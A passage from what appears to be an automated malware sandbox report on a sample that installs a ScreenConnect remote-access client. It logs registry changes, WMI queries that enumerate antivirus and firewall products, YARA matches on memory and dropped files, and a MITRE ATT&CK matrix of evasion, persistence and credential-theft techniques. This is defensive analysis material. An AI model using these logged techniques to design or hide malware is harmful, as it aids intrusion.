                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI8F57.tmp-\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                      Source: Yara matchFile source: 00000014.00000002.1542049999.0000000005790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.1546459519.00000000075E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000000.1515151680.0000000000EC6000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.1533504706.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\Downloads\Unconfirmed 804247.crdownload, type: DROPPED
                      Source: Yara matchFile source: 0000001C.00000000.1584484803.0000000000712000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1751971553.0000000007371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1734467587.0000000002AEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Windows\Temp\~DF42CD5E763AF0112E.TMP, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Temp\~DF402DAAA47C81A5E6.TMP, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Temp\~DF0ECFDAA9E240F7F8.TMP, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Temp\~DFF4B271A08BFF7223.TMP, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                      Source: Yara matchFile source: C:\Config.Msi\60deb5.rbs, type: DROPPED
                      Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, type: DROPPED
                      Source: Yara matchFile source: 00000028.00000002.2040657756.0000000007AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.2016235935.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Windows\Temp\~DFFD1E74624B2A07AF.TMP, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Temp\~DFF27562D9BAF51155.TMP, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Temp\~DF20F2A043957C83BC.TMP, type: DROPPED
                      Source: Yara matchFile source: 0000001C.00000002.2232338708.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Replication Through Removable Media
                      31
                      Windows Management Instrumentation
                      1
                      Component Object Model Hijacking
                      1
                      Component Object Model Hijacking
                      22
                      Masquerading
                      OS Credential Dumping15
                      Security Software Discovery
                      Remote ServicesData from Local System2
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter
                      2
                      Windows Service
                      2
                      Windows Service
                      21
                      Disable or Modify Tools
                      LSASS Memory1
                      Process Discovery
                      Remote Desktop ProtocolData from Removable Media1
                      Non-Application Layer Protocol
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt31
                      Browser Extensions
                      11
                      Process Injection
                      71
                      Virtualization/Sandbox Evasion
                      Security Account Manager71
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron1
                      Registry Run Keys / Startup Folder
                      1
                      Registry Run Keys / Startup Folder
                      11
                      Process Injection
                      NTDS11
                      Peripheral Device Discovery
                      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchd1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Rundll32
                      LSA Secrets1
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain Credentials35
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      File Deletion
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.